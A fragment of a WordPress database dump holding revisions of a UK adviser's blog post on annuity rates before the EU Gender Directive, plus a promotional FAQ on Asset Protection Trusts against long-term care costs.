Retirement?</li>\n</ul>\n</div>\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;\n<div id=\"main\" class=\"clearfix \">\n\n&nbsp;\n<div class=\"avada-row\">\n<div id=\"post-806\" class=\"post-806 post type-post status-publish format-standard has-post-thumbnail hentry category-pensions post\">\n<span class=\"entry-title\" style=\"display: none;\">Approaching Retirement?</span>\n<div class=\"post-content\">\n\n&nbsp;\n<h2>Men Warned to Act Now on Annuities or Face Lower Retirement Income</h2>\n&nbsp;\n\n&nbsp;\n\nMen looking to buy an annuity – a retirement income for life – are being urged to purchase before the introduction of the new EU Gender Directive (<a href=\"../insurance-protection/g-day-impact-gender-directive-insurance/\">G-Day</a>), which comes into force on 21st December, to benefit from higher interest rates.\n\n&nbsp;\n\nMen who are on the verge of retirement should buy their annuity sooner rather than later, as the\n\n&nbsp;\n\nBrussels-devised directive could see them receive a permanently lower retirement income if they delay.<span id=\"more-806\"></span>\n\n&nbsp;\n<blockquote>&nbsp;\n<p align=\"JUSTIFY\">An annuity purchase is for life, so the right product is as important as the right annuity rate.</p>\n&nbsp;</blockquote>\n&nbsp;\n\nCurrently, men, after purchasing an annuity, will receive higher retirement incomes than women, because women, on average, live longer, meaning the money has to last longer.\n\n&nbsp;\n<h2>But That is All About to Change</h2>\n&nbsp;\n\nWhen the gender directive comes into force, it will become illegal for an insurer to factor-in gender when determining an insurance premium.  This means that <em>annuity rates</em> are likely to fall for males, but could improve for females.\n\n&nbsp;\n\nThe changes mean that men could lose up to 10 percent of their potential annuity incomes.\n\n&nbsp;\n\n<address>source:Hargreaves Landsdown</address>&nbsp;\n\n<address> </address>&nbsp;\n\nDespite growing calls for urgency, we – along with many respected financial experts – stress that buying an annuity is an important decision and should not be rushed into. You should always discuss your options with a fully qualified independent financial adviser who has access to a wide range of investment products.\n\n&nbsp;\n\nEquity SMART also specialise in <em>Enhanced Annuities</em> so by speaking to us we could increase your retirement income further and avoid the looming reductions.\n\n&nbsp;\n\n&nbsp;\n\n</div>\n&nbsp;\n<div class=\"meta-info\">\n\n&nbsp;\n<div class=\"vcard\">\nBy <span class=\"fn\"><a title=\"Posts by Equity SMART\" href=\"../author/sallyannhunt/\" rel=\"author\">Equity SMART</a></span><span class=\"sep\">|</span>Categories: <a title=\"View all posts in Pensions\" href=\"../category/pensions/\" rel=\"category tag\">Pensions</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a title=\"Comment on Approaching Retirement?\" href=\"../approaching-retirement/\">0 Comments</a></div>\n&nbsp;\n\n</div>\n&nbsp;\n<div class=\"share-box\">\n\n&nbsp;\n<h4></h4>\n&nbsp;\n<ul class=\"social-networks social-networks-dark\">\n<ul class=\"social-networks social-networks-dark\">\n 	<li class=\"facebook\">\n<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/approaching-retirement/&amp;p[title]=Approaching%20Retirement?\" target=\"_blank\" rel=\"nofollow\">\nFacebook\n</a>\n<div class=\"popup\">\n\n&nbsp;\n<div class=\"holder\">\n\n&nbsp;\n\nFacebook\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"social-networks social-networks-dark\">\n<ul class=\"social-networks social-networks-dark\">\n 	<li class=\"twitter\">\n<a href=\"http://twitter.com/home?status=Approaching+Retirement%3F%20http://www.equalitywalk.org.uk/approaching-retirement/\" target=\"_blank\" rel=\"nofollow\">\nTwitter\n</a>\n<div class=\"popup\">\n\n&nbsp;\n<div class=\"holder\">\n\n&nbsp;\n\nTwitter\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"social-networks social-networks-dark\">\n<ul class=\"social-networks social-networks-dark\">\n 	<li class=\"linkedin\">\n<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/approaching-retirement/&amp;title=Approaching%20Retirement?\" target=\"_blank\" rel=\"nofollow\">\nLinkedIn\n</a>\n<div class=\"popup\">\n\n&nbsp;\n<div class=\"holder\">\n\n&nbsp;\n\nLinkedIn\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"social-networks social-networks-dark\">\n<ul class=\"social-networks social-networks-dark\">\n 	<li class=\"reddit\">\n<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/approaching-retirement/&amp;title=Approaching%20Retirement?\" target=\"_blank\" rel=\"nofollow\">\nReddit\n</a>\n<div class=\"popup\">\n\n&nbsp;\n<div class=\"holder\">\n\n&nbsp;\n\nReddit\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"social-networks social-networks-dark\">\n<ul class=\"social-networks social-networks-dark\">\n 	<li class=\"tumblr\">\n<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fapproaching-retirement%2F&amp;name=Approaching+Retirement%3F&amp;description=Men+Warned+to+Act+Now+on+Annuities+or+Face+Lower+Retirement+Income+Men+looking+to+buy+an+annuity%C2%A0%E2%80%93+a+retirement+income+for+life+%E2%80%93%C2%A0are+being+urged+to+purchase+before+the+introduction+of+the+new+EU+Gender+Directive+%28G-Day%29%2C+which+comes+into+force+on+21st+December%2C+%5B%26hellip%3B%5D\" target=\"_blank\" rel=\"nofollow\">\nTumblr\n</a>\n<div class=\"popup\">\n\n&nbsp;\n<div class=\"holder\">\n\n&nbsp;\n\nTumblr\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"social-networks social-networks-dark\">\n<ul class=\"social-networks social-networks-dark\">\n 	<li class=\"google\">\n<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/approaching-retirement/\" target=\"_blank\" rel=\"nofollow\">\nGoogle +1\n</a>\n<div class=\"popup\">\n\n&nbsp;\n<div class=\"holder\">\n\n&nbsp;\n\nGoogle +1\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"social-networks social-networks-dark\">\n<ul class=\"social-networks social-networks-dark\">\n 	<li class=\"tf-pinterest\">\n<a href=\"#\">\nPinterest\n</a>\n<div class=\"popup\">\n\n&nbsp;\n<div class=\"holder\">\n\n&nbsp;\n\nPinterest\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"social-networks social-networks-dark\">\n<ul class=\"social-networks social-networks-dark\">\n 	<li class=\"email\">\n<a href=\"mailto:?subject=Approaching Retirement?&amp;body=http://www.equalitywalk.org.uk/approaching-retirement/\">\nEmail\n</a>\n<div class=\"popup\">\n\n&nbsp;\n<div class=\"holder\">\n\n&nbsp;\n\nEmail\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n\n</div>\n&nbsp;\n<div class=\"about-author\">\n\n&nbsp;\n<div class=\"title\">\n<h2>About the Author: <a title=\"Posts by Equity SMART\" href=\"../author/sallyannhunt/\" rel=\"author\">Equity SMART</a></h2>\n<div class=\"title-sep-container\"></div>\n</div>\n&nbsp;\n<div class=\"about-author-container\"></div>\n&nbsp;\n\n</div>\n<!-- You can start editing here. -->\n\n\n<!-- If comments are open, but there are no comments. -->\n<div id=\"respond\" class=\"comment-respond\">\n\n&nbsp;\n<div class=\"title\">\n<h2></h2>\n<div class=\"title-sep-container\"></div>\n</div>\n<small><a id=\"cancel-comment-reply-link\" style=\"display: none;\" href=\"../approaching-retirement/\" rel=\"nofollow\">Cancel reply</a></small>\n\n<form id=\"commentform\" class=\"comment-form\" action=\"/\" method=\"post\">&nbsp;\n<div id=\"comment-input\"><input id=\"author\" class=\"input-name\" tabindex=\"1\" name=\"author\" size=\"22\" type=\"text\" value=\"\" placeholder=\"Name (required)\" /><input id=\"email\" class=\"input-email\" tabindex=\"2\" name=\"email\" size=\"22\" type=\"text\" value=\"\" placeholder=\"Email (required)\" /></div>\n&nbsp;\n<div id=\"comment-textarea\"></div>\n<p class=\"form-submit\">\n<input id=\"comment-submit\" name=\"submit\" type=\"submit\" value=\"Post Comment\" /><input id=\"comment_post_ID\" name=\"comment_post_ID\" type=\"hidden\" value=\"806\" /></p>\n&nbsp;\n<p style=\"display: none;\"><input id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" type=\"hidden\" value=\"04bb6445b2\" /></p>\n&nbsp;\n<p style=\"display: none;\"><input id=\"ak_js\" name=\"ak_js\" type=\"hidden\" value=\"104\" /></p>\n&nbsp;\n\n</form></div>\n<!-- #respond -->\n<script type=\"text/javascript\"><![CDATA[ jQuery(document).ready(function () { jQuery(\'#commentform\').submit(function () { _gaq.push( [\'_setAccount\', \'UA-10958181-3\'], [\'_trackEvent\', \'comment\', \'submit\'] ); }); }); ]]></script>\" width=\"20\" height=\"20\"&gt;\n\n</div>\n</div>\n</div>\n</div>','Approaching Retirement?','','inherit','closed','closed','','46-autosave-v1','','','2017-09-21 17:02:55','2017-09-21 17:02:55','',46,'http://www.equalitywalk.org.uk/46-autosave-v1',0,'revision','',0),(305,1,'2017-09-21 17:04:51','2017-09-21 17:04:51','<div id=\"wrapper\">\r\n<div class=\"header-wrapper\">\r\n<div class=\"header-v3\"><header id=\"header\">\r\n<div class=\"avada-row\" style=\"margin-top: 0px; margin-bottom: 0px;\"><nav id=\"nav\" class=\"nav-holder\"><a href=\"../better-pension-drawdown-annuity/\">Which is Better Pension Drawdown or Annuity</a>\r\n\r\n</nav></div>\r\n</header></div>\r\n</div>\r\n<div class=\"page-title-container\">\r\n<div class=\"page-title\">\r\n<div class=\"page-title-wrapper\">\r\n<div class=\"page-title-captions\">\r\n<h1 class=\"entry-title\">\r\nApproaching Retirement?</h1>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div id=\"main\" class=\"clearfix \">\r\n<div class=\"avada-row\"><span class=\"entry-title\" style=\"display: none;\">Approaching Retirement</span>\r\n<div id=\"post-806\" class=\"post-806 post type-post status-publish format-standard has-post-thumbnail hentry category-pensions post\">\r\n<div class=\"post-content\">\r\n\r\n&nbsp;\r\n<h2>Men Warned to Act Now on Annuities or Face Lower Retirement Income</h2>\r\n&nbsp;\r\n\r\nMen looking to buy an annuity – a retirement income for life – are being urged to purchase before the introduction of the new EU Gender Directive (<a href=\"../insurance-protection/g-day-impact-gender-directive-insurance/\">G-Day</a>), which comes into force on 21st December, to benefit from higher interest rates.\r\n<p align=\"JUSTIFY\">Men who are on the verge of retirement should buy their annuity sooner rather than later, as the  Brussels-devised directive could see them receive a permanently lower retirement income if they delay. An annuity purchase is for life, so the right product is as important as the right annuity rat</p>\r\nCurrently, men, after purchasing an annuity, will receive higher retirement incomes than women, because women, on average, live longer, meaning the money has to last longer.\r\n\r\n&nbsp;\r\n<h2>But That is All About to Change</h2>\r\nWhen the gender directive comes into force, it will become illegal for an insurer to factor-in gender when determining an insurance premium.  This means that <em>annuity rates</em> are likely to fall for males, but could improve for females.\r\n\r\n&nbsp;\r\n\r\nThe changes mean that men could lose up to 10 percent of their potential annuity incomes.\r\n\r\n&nbsp;\r\n\r\n<address>source:Hargreaves Landsdown</address>&nbsp;\r\n\r\n<address> </address>&nbsp;\r\n\r\nDespite growing calls for urgency, we – along with many respected financial experts – stress that buying an annuity is an important decision and should not be rushed into. You should always discuss your options with a fully qualified independent financial adviser who has access to a wide range of investment products.\r\n\r\n&nbsp;\r\n\r\nEquity SMART also specialise in <em>Enhanced Annuities</em> so by speaking to us we could increase your retirement income further and avoid the looming reductions.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class=\"meta-info\">\r\n\r\n&nbsp;\r\n<div class=\"vcard\">\r\nBy <span class=\"fn\"><a title=\"Posts by Equity SMART\" href=\"../author/sallyannhunt/\" rel=\"author\">Equity SMART</a></span><span class=\"sep\">|</span>Categories: <a title=\"View all posts in Pensions\" href=\"../category/pensions/\" rel=\"category tag\">Pensions</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a title=\"Comment on Approaching Retirement?\" href=\"../approaching-retirement/\">0 Comments</a></div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class=\"share-box\">\r\n\r\n&nbsp;\r\n<h4></h4>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"facebook\">\r\n<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/approaching-retirement/&amp;p[title]=Approaching%20Retirement?\" target=\"_blank\" rel=\"nofollow\">\r\nFacebook\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nFacebook\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"twitter\">\r\n<a href=\"http://twitter.com/home?status=Approaching+Retirement%3F%20http://www.equalitywalk.org.uk/approaching-retirement/\" target=\"_blank\" rel=\"nofollow\">\r\nTwitter\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nTwitter\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"linkedin\">\r\n<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/approaching-retirement/&amp;title=Approaching%20Retirement?\" target=\"_blank\" rel=\"nofollow\">\r\nLinkedIn\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nLinkedIn\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"reddit\">\r\n<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/approaching-retirement/&amp;title=Approaching%20Retirement?\" target=\"_blank\" rel=\"nofollow\">\r\nReddit\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nReddit\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"tumblr\">\r\n<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fapproaching-retirement%2F&amp;name=Approaching+Retirement%3F&amp;description=Men+Warned+to+Act+Now+on+Annuities+or+Face+Lower+Retirement+Income+Men+looking+to+buy+an+annuity%C2%A0%E2%80%93+a+retirement+income+for+life+%E2%80%93%C2%A0are+being+urged+to+purchase+before+the+introduction+of+the+new+EU+Gender+Directive+%28G-Day%29%2C+which+comes+into+force+on+21st+December%2C+%5B%26hellip%3B%5D\" target=\"_blank\" rel=\"nofollow\">\r\nTumblr\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nTumblr\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"google\">\r\n<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/approaching-retirement/\" target=\"_blank\" rel=\"nofollow\">\r\nGoogle +1\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nGoogle +1\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"tf-pinterest\">\r\n<a href=\"#\">\r\nPinterest\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nPinterest\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"email\">\r\n<a href=\"mailto:?subject=Approaching Retirement?&amp;body=http://www.equalitywalk.org.uk/approaching-retirement/\">\r\nEmail\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nEmail\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class=\"about-author\">\r\n\r\n&nbsp;\r\n<div class=\"title\">\r\n<h2>About the Author: <a title=\"Posts by Equity SMART\" href=\"../author/sallyannhunt/\" rel=\"author\">Equity SMART</a></h2>\r\n<div class=\"title-sep-container\"></div>\r\n</div>\r\n&nbsp;\r\n<div class=\"about-author-container\"></div>\r\n&nbsp;\r\n\r\n</div>\r\n<!-- You can start editing here. -->\r\n\r\n\r\n<!-- If comments are open, but there are no comments. -->\r\n<div id=\"respond\" class=\"comment-respond\">\r\n\r\n&nbsp;\r\n<div class=\"title\">\r\n<h2></h2>\r\n<div class=\"title-sep-container\"></div>\r\n</div>\r\n<small><a id=\"cancel-comment-reply-link\" style=\"display: none;\" href=\"../approaching-retirement/\" rel=\"nofollow\">Cancel reply</a></small>\r\n\r\n<form id=\"commentform\" class=\"comment-form\" action=\"/\" method=\"post\">&nbsp;\r\n<div id=\"comment-input\"><input id=\"author\" class=\"input-name\" tabindex=\"1\" name=\"author\" size=\"22\" type=\"text\" value=\"\" placeholder=\"Name (required)\" /><input id=\"email\" class=\"input-email\" tabindex=\"2\" name=\"email\" size=\"22\" type=\"text\" value=\"\" placeholder=\"Email (required)\" /></div>\r\n&nbsp;\r\n<div id=\"comment-textarea\"></div>\r\n<p class=\"form-submit\">\r\n<input id=\"comment-submit\" name=\"submit\" type=\"submit\" value=\"Post Comment\" /><input id=\"comment_post_ID\" name=\"comment_post_ID\" type=\"hidden\" value=\"806\" /></p>\r\n&nbsp;\r\n<p style=\"display: none;\"><input id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" type=\"hidden\" value=\"04bb6445b2\" /></p>\r\n&nbsp;\r\n<p style=\"display: none;\"><input id=\"ak_js\" name=\"ak_js\" type=\"hidden\" value=\"104\" /></p>\r\n&nbsp;\r\n\r\n</form></div>\r\n<!-- #respond -->\r\n<script type=\"text/javascript\"><![CDATA[ jQuery(document).ready(function () { jQuery(\'#commentform\').submit(function () { _gaq.push( [\'_setAccount\', \'UA-10958181-3\'], [\'_trackEvent\', \'comment\', \'submit\'] ); }); }); ]]></script>\" width=\"20\" height=\"20\"&gt;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Approaching Retirement?','Men approaching retirement and looking to buy an annuity are urged to buy before the new EU Gender Directive in December comes into effect','inherit','closed','closed','','46-revision-v1','','','2017-09-21 17:04:51','2017-09-21 17:04:51','',46,'http://www.equalitywalk.org.uk/46-revision-v1',0,'revision','',0),(306,1,'2017-09-21 17:07:15','2017-09-21 17:07:15','And that the Council can take all your assets — including your house — to pay for the care? Only the last £14,500 is protected!\r\n\r\nSo just think what you could lose!\r\n<h4>You have 3 options:-</h4>\r\n<ol>\r\n<ol>\r\n 	<li>You could do nothing and hope for the best. This is not what we would recommend.</li>\r\n</ol>\r\n</ol>\r\n<ol>\r\n<ol>\r\n 	<li>You could transfer your assets to your family. By doing this you may protect your assets but you lose control. There are many things that can go wrong with this; your family may have to pay Capital Gains Tax on the asset, they may get divorced or go bankrupt, or simply fall out. Again, we don’t recommend this.</li>\r\n</ol>\r\n</ol>\r\n<ol>\r\n<ol>\r\n 	<li>Or you could transfer your assets including your house into an <em>Asset Protection Trust</em>. This allows you to have total control over your assets and helps protects them.</li>\r\n</ol>\r\n</ol>\r\nTo find out more about Asset Protection Trusts and to get the advice you need, please either call us on the telephone number above or complete our quick enquiry form below, and we’ll call you straight back to help you with your investment questions.\r\n\r\nWe are ready for your call.\r\n\r\nHow are your Assets considered for Long Term Care?\r\n<ul>\r\n<ul>\r\n 	<li>A Doctor, in conjunction with the family, will decide whether you need long term care.</li>\r\n</ul>\r\n</ul>\r\n<ul>\r\n<ul>\r\n 	<li>If you need nursing care, the Council must arrange for the care and they must pay for it.</li>\r\n</ul>\r\n</ul>\r\n<ul>\r\n<ul>\r\n 	<li>The council has the right to try and recover these costs and they may try to do this. It is more difficult for them to recover costs as the assets are no longer in your name, but in the name of the Trust. The Solicitor Trustees will always deal with the Local Authority and respond to any challenge. The CRAG Report (Charges for Residential Accommodation Guide) states that ‘it would be unreasonable to decide that deliberate deprivation had taken place if the deposit took place when the claimant was fit and healthy and could not have foreseen the need to move into residential accommodation’. Therefore the sooner a Trust is set up the better.</li>\r\n</ul>\r\n</ul>\r\n<ul>\r\n<ul>\r\n 	<li>The Council will fund your care up to their maximum funding rate but the Care Homes normally settle for this amount instead of demanding the private rate.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n\r\nApart from care costs, the Asset Protection Trust has other big advantages. It will avoid Executory procedure on your death and save money. If most of your assets are in the trust then there will be no Executory Costs and your estate can be paid over to your beneficiaries without delay, usually within a couple of weeks. On death, estates normally cannot be paid out within the first 6 months, and can take up to two years to complete. Assets in a Trust are paid out immediately.\r\n\r\n&nbsp;\r\n\r\nEven if you have a mortgage on your property which you do not want to pay off, then we can, in some cases, still set up a Assets Protection Trust, as long as the lender agrees.\r\n\r\n&nbsp;\r\n\r\nSome commonly asked questions:\r\n\r\nWhy is it important? - If the time comes when you do need to go into care, you may find that the assets like your home that’s taken a lifetime to accumulate, can be used for the cost of care rather than going directly to your beneficiaries.\r\n\r\nMy family will take of me - Lots of things can change in your lifetime – we are seeing more children become dependent on their parents again due to the economic climate – it may never happen but the current fact speak for themselves that 1 in 4 men and 1 in 3 women unfortunately have to go into care when they are over 65.\r\n\r\nWill I get any benefit from it? - Like all things in life it is about making a plan for the eventuality – if the result can save you a significant sum in care costs then it is obviously worth it. Saving on expensive legal probate costs will be of value also.\r\n\r\nWhat if I don’t go into care? - Winding up your estate can be costly and time consuming so you will see the benefit by avoiding the in the costs and difficulty involved, in winding up your estate. A solicitor needs appointed when you die to carry out the necessary executory work particularly if the house is in your name and can be expensive. However if you have taken the right steps and you have appointed you home to the Trust then you will find that the Trustees can complete things quickly and efficiently on your behalf.\r\n\r\nWhat is the Solicitors role? - Keeping control as a Trustee will be important for you, so if you need to make any key changes or decisions about the Trust your appointed solicitor will always be on your side providing more peace of mind that you can’t be outvoted.\r\n\r\nI have heard that you need two Solicitors – is this true? - If you’re Will leaves your estate to more or one beneficiaries then it is important that there are two Solicitors as Trustees, to outvote the remaining family member Trustee. Otherwise he could take control. With two Solicitors this ensures that what you want to happen after your death will actually happen.\r\n\r\n&nbsp;\r\n\r\nCan I trust the Solicitors? - Solicitors have a duty of care and are bound by the laws of their profession by The Law Society in England and Wales and also The Law Society of Scotland and they cannot benefit from the Trust directly as named beneficiaries.\r\n\r\n&nbsp;\r\n\r\nWhat are the ongoing fees and costs? - There are NO ongoing fees. With this scheme you pay the fee to set up the Trust at the outset and have nothing further to pay unless you go into care and there is a dispute with the Council, which is very rare.\r\n\r\n&nbsp;\r\n\r\nWhat kinds of assets can be placed in the Trust? - You are not means tested by the local authority on any capital up to £14500 and is ignored  – you will tend to look first at other assets like your house, we will advice you on what would be best suited to being allocated to your Trust.\r\n\r\n&nbsp;\r\n\r\nCan other assets be added at a later date? - You can, as assets can be placed in the trust at a later although, this will start the 6 month clock ticking on  that particular asset.\r\n\r\n&nbsp;\r\n\r\nIs there any limit on the value of assets placed with the Trust? - The Asset Protection Trust will usually hold assets up to the value of the current Nil Rate Band (£325,000 for the tax year 2010/11) for each client, as any assets in excess of this would create an immediate charge to lifetime Inheritance Tax of 40%. There are however a number of other options to safeguard your assets if 2 Trusts do not cover your entire estate.\r\n\r\n&nbsp;\r\n\r\nWhen is the best time to set up the Trust? - We would recommend as quickly as possible after you have considered all you options. You will always be under scrutiny from Local Authorities to look back and  review the circumstances in which a Family Protection Trust was set up at any time. You will have less to worry about if it was apparent  you had expectation in entering long term care.\r\n\r\n&nbsp;\r\n\r\nCan I change my mind? - You have control so if anything changes you will have the choice for everything to revert to the way it was in your name only.\r\n\r\n&nbsp;\r\n\r\nCan I move house? - Yes, since you control the Trust you can move house in the usual way except that the deeds are signed by all the Trustees rather than by you alone; but that makes no difference.\r\n\r\n&nbsp;\r\n\r\nWhat happens if one of us dies? - Nothing. The Trust, and the protection that is provides, simply continues as before until the second person dies. The survivor continues to retain control of the Trust.\r\n\r\n&nbsp;\r\n\r\nWhat happens if one of us becomes incapacitated? - Nothing. The remaining Trustees simply continue as before. We also prepare Powers of Attorney as part of this process to allow this to happen. Otherwise without this arrangement, the family may have to go to Court to obtain a Guardianship Order which can be a very difficult and expensive process.\r\n\r\n&nbsp;\r\n\r\nWhat happens if one of the other Trustees die? - A new Trustee is simply assumed in their place.\r\n\r\n&nbsp;\r\n\r\nWho gets my estate when I die? - You will decide you your named beneficiaries are in your Will and letter of wishes. The Trustees will then look to execute your wishes in a timely fashion. Having two Solicitor Trustees ensures this happens quickly and efficiently.\r\n\r\n&nbsp;\r\n\r\nDo I need a Will then? - Yes, Wills are extremely important. Any estate which is in your name when you die will be dealt with according to the terms of your <a href=\"/wills-trust\" data-bitly-type=\"bitly_hover_card\">Will</a>, assuming the class of beneficiaries names remains the same. We will discuss this with you when setting up the trust.\r\n\r\n&nbsp;\r\n\r\n<!-- end .entry-content -->\r\n\r\n<!-- end .postclass -->\r\n\r\n<!--end #comments-->\r\n<div id=\"respond\">\r\n<form id=\"commentform\" action=\"/\" method=\"post\">\r\n<p class=\"form-submit\"><input id=\"submit\" name=\"submit\" type=\"submit\" value=\"Post Comment\" /></p>\r\n&nbsp;\r\n<p style=\"display: none;\"><input id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" type=\"hidden\" value=\"f8d04d5f05\" /></p>\r\n&nbsp;\r\n\r\n</form></div>\r\n<!-- #respond -->\r\n\r\n<!-- end #content -->\r\n<div id=\"sidebar\" class=\"sidebar widget-area\">\r\n\r\n&nbsp;\r\n<div id=\"text-3\" class=\"widget widget_text\">\r\n<div class=\"widget-wrap\">\r\n<div class=\"textwidget\">\r\n\r\n<!-- AddThis Button BEGIN -->\r\n<div class=\"addthis_toolbox addthis_default_style addthis_32x32_style\"></div>\r\n<!-- AddThis Button END -->\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div id=\"text-2\" class=\"widget widget_text\">\r\n<div class=\"widget-wrap\">\r\n<div class=\"textwidget\">\r\n<div id=\"sidebar-contact-form\">\r\n<div id=\"wpcf7-f447-w1-o1\" class=\"wpcf7\"><form class=\"wpcf7-form\" action=\"../../asset-protection/\" method=\"post\">&nbsp;\r\n<div style=\"display: none;\"><input name=\"_wpcf7\" type=\"hidden\" value=\"447\" /><input name=\"_wpcf7_version\" type=\"hidden\" value=\"3.2\" /><input name=\"_wpcf7_unit_tag\" type=\"hidden\" value=\"wpcf7-f447-w1-o1\" /><input name=\"_wpnonce\" type=\"hidden\" value=\"fccd9351f5\" /></div>\r\n&nbsp;\r\n\r\nYour Name (required)\r\n<span class=\"wpcf7-form-control-wrap your-name\"><input class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" name=\"your-name\" size=\"40\" type=\"text\" value=\"\" /></span>\r\n\r\n&nbsp;\r\n\r\nYour Email (required)\r\n<span class=\"wpcf7-form-control-wrap your-email\"><input class=\"wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email\" name=\"your-email\" size=\"40\" type=\"text\" value=\"\" /></span>\r\n\r\n&nbsp;\r\n\r\nYour Message\r\n<span class=\"wpcf7-form-control-wrap your-message\"><textarea class=\"wpcf7-form-control wpcf7-textarea\" cols=\"40\" name=\"your-message\" rows=\"10\"></textarea></span>\r\n\r\n&nbsp;\r\n<div class=\"side-contact-submit\"><input class=\"wpcf7-form-control wpcf7-submit\" type=\"submit\" value=\"Send Your Message\" /></div>\r\n&nbsp;\r\n<div 